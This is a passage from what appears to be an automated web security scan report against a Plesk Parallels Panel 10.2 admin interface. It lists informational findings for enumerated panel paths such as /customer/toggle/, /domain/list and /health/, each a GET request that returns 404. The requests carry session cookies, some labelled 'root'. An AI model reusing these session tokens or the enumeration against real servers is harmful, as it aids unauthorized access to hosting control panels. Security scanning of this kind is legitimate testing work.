Path:   /customer/toggle/

Request

GET /customer/toggle/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; adminclienttrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; sessionslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 16:02:47 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.119. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/toggle/id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/toggle/id/

Request

GET /customer/toggle/id/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; adminclienttrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; sessionslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 16:02:47 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.120. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/toggle/id/4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/toggle/id/4

Request

GET /customer/toggle/id/4 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/overview/id/4
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; adminclienttrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; sessionslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 16:02:47 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.121. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/domain/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /domain/

Request

GET /domain/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:16:01 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.122. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/domain/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /domain/list

Request

GET /domain/list HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:24:30 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.123. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/domain/list-data  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /domain/list-data

Request

GET /domain/list-data HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:24:30 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.124. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/email-address/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /email-address/

Request

GET /email-address/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; psaContext=personal-info; PHPSESSID=d8ba52f4ed7d0d502435be2945503b28; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 12:14:22 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.125. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/email-address/configuration/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /email-address/configuration/

Request

GET /email-address/configuration/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; psaContext=personal-info; PHPSESSID=d8ba52f4ed7d0d502435be2945503b28; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 12:14:22 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.126. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/email-address/configuration/id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /email-address/configuration/id/

Request

GET /email-address/configuration/id/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; psaContext=personal-info; PHPSESSID=d8ba52f4ed7d0d502435be2945503b28; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 12:14:22 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.127. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/health/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /health/

Request

GET /health/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Expires: Mon, 24 Oct 2011 14:16:01 GMT
Cache-Control: max-age=2592000
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:16:01 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.128. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/health/chart-image/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /health/chart-image/

Request

GET /health/chart-image/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:57 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.129. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/health/parameters/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /health/parameters/

Request

GET /health/parameters/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:16:01 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.130. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/health/parameters/group/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /health/parameters/group/

Request

GET /health/parameters/group/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=service-plans; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:16:01 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.131. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/health/parameters/group/Services  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /health/parameters/group/Services

Request

GET /health/parameters/group/Services HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:54 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.132. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/health/restore-defaults  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /health/restore-defaults

Request

GET /health/restore-defaults HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:47 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.133. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/health/server-status/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /health/server-status/

Request

GET /health/server-status/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:46 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.134. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/health/thresholds-hint/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /health/thresholds-hint/

Request

GET /health/thresholds-hint/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:47 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
